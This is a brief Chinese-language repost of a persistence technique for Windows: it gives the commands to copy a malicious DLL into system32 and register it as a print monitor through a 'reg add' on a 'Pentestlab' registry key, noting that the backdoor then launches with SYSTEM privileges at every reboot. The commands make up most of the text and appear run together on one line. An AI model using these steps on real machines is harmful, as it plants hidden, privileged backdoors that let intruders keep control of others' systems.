本文共 217 字,大约阅读时间需要 1 分钟。
需要管理员权限,将恶意的dll文件上传到system32文件夹下:
copy test.dll c:\windows\system32reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ
当主机重启的时候会触发后门,且后门以system权限启动。
转载地址:http://cqraf.baihongyu.com/